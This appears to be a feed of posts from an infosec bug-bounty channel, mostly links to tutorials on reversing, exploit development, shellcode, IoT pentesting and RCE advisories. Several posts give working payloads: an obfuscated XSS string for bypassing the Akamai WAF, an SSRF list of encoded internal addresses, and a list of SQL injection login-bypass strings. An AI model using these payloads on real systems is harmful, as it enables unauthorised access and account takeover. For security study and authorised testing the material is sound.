Information Security

96 views18:27

https://twitter.com/Hacker_Sujeet/status/1238152947055218688?s=20

Regular expression to find URLs within a string 1.This is the 1 I use Works for me (http|ftp|https)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])? 2. "(?:(?:https?|ftp):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-?=%.]+" 3.((http|ftp|https):\/\/)?(([\w.…

118 views18:34

Information Security

A good way to bypass the Akamai WAF by exploiting a redirect-based XSS is with the following payload:

javascript:new%20Function`al\ert\`1\``;

You can also obfuscate it using HTML entities

#BugBounty

116 views18:35

Information Security

Social Distancing Survival Guide

Learn...

Reverse Engineering:
https://github.com/tylerha97/awesome-reversing

Reverse Engineering Malware:
https://malwareunicorn.org/workshops/re101.html#0
https://malwareunicorn.org/workshops/re102.html#0

Web Hacking:
https://portswigger.net/web-security
https://github.com/infoslack/awesome-web-hacking/blob/master/README.md

Exploit Development:
https://github.com/FabioBaroni/awesome-exploit-development/blob/master/README.md

GitHub

GitHub - tylerha97/awesome-reversing: A curated list of awesome reversing resources

A curated list of awesome reversing resources. Contribute to tylerha97/awesome-reversing development by creating an account on GitHub.

123 views11:30

Information Security

APT Lifecycle:
https://azeria-labs.com/advanced-persistent-threat/

Arm Assembly:
https://azeria-labs.com/writing-arm-assembly-part-1/

Arm32 Shellcoding:
https://azeria-labs.com/writing-arm-shellcode/
https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/

Heap Exploitaiton:
https://azeria-labs.com/heap-exploit-development-part-1/
https://azeria-labs.com/heap-overflows-and-the-ios-kernel-heap/
https://azeria-labs.com/grooming-the-ios-kernel-heap/

Azeria-Labs

Advanced Persistent Threat

109 viewsedited 11:31

Information Security

Pentesting IoT devices

Part 1: https://blog.mindedsecurity.com/2018/09/pentesting-iot-devices-part-1-static.html

Part 2: https://blog.mindedsecurity.com/2018/10/pentesting-iot-devices-part-2-dynamic.html

Books and resources: https://github.com/V33RU/IoTSecurity101/blob/master/README.md

Mindedsecurity

Pentesting IoT devices (Part 1: Static Analysis)

Introduction Intelligent dishwashers, smart factories, connected sensors and Wi-Fi fridges, these are only a few examples of everyday ...

106 views11:31

Information Security

https://ssd-disclosure.com/archives/4097/ssd-advisory-horde-groupware-webmail-edition-remote-code-execution

SSD Secure Disclosure

SSD Advisory - Horde Groupware Webmail Edition Remote Code Execution - SSD Secure Disclosure

Vulnerability Summary The Horde project comprises of several standalone applications and libraries. The Horde Groupware Webmail Edition suite bundles several of them by default, among those, Data is a library used to manager data import/export in several…

178 views12:59

Information Security

#bugbounty

Pentest-guide
https://github.com/Voorivex/pentest-guide
naabu
https://github.com/projectdiscovery/naabu
Osmedeus
https://github.com/j3ssie/Osmedeus
SubDomainizer
https://github.com/nsonaniya2010/SubDomainizer
security-tools
https://github.com/bl4de/security-tools
assessment-mindset
https://github.com/dsopas/assessment-mindset
Sudomy
https://github.com/Screetsec/Sudomy

#bugbountytips

GitHub

GitHub - Voorivex/pentest-guide: Penetration tests guide based on OWASP including test cases, resources and examples.

Penetration tests guide based on OWASP including test cases, resources and examples. - Voorivex/pentest-guide

108 views13:01

Information Security

https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/

cardaci.xyz

[CVE-2020-8518] Horde Groupware Webmail Edition 5.2.22 — RCE in CSV data import

A vulnerability in the handling of CSV data import allows authenticated users to inject arbitrary PHP code thus achieving RCE on the server hosting the web application.

103 views13:03

Information Security

https://www.lares.com/hunting-azure-admins-for-vertical-escalation/

Lares

Hunting Azure Admins for Vertical Escalation - Lares

There is a lot of excellent public research on attacking Azure, however, most research tends to focus on tactics that assume you have first obtained some form of access, such as compromised credentials. This post will focus on one example of obtaining those…

105 views13:04

Information Security

https://medium.com/@secureITmania/a-secret-note-to-bug-hunters-about-url-structure-and-its-parsers-2982f70ff6d6

Medium

A secret note to Bug hunters about URL structure and its parsers.

Understanding the proper URL structure is important to every Bug bounty hunter. So lets go deep dive into the URL structure.

116 views06:44

Information Security

Another SSRF List:
http://[::]:80/
http://[::]:25/
http://[::]:22/
http://[::]:3128/
http://0000::1:80/
http://0000::1:25/
http://0000::1:22/
http://0000::1:3128/
http://127.0.1.3
http://127.0.0.0
http://0177.0.0.1/
http://2130706433/
http://3232235521/
http://3232235777/

118 views08:39

Information Security

sql injection login bypass

' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*

#payloads #payload #bypass

161 viewsedited 09:09

Information Security

https://medium.com/@justm0rph3u5/blocked-user-can-send-notification-due-to-logical-bug-in-instagram-first-instagram-bug-2bd09aa52f14

Medium

Blocked User Can Send Notification Due to Logical Bug in Instagram | First Instagram Bug

Privacy Violation issue Instagram

105 views09:21

Information Security

https://github.com/GrrrDog/weird_proxies

GitHub

GitHub - GrrrDog/weird_proxies: Reverse proxies cheatsheet

Reverse proxies cheatsheet. Contribute to GrrrDog/weird_proxies development by creating an account on GitHub.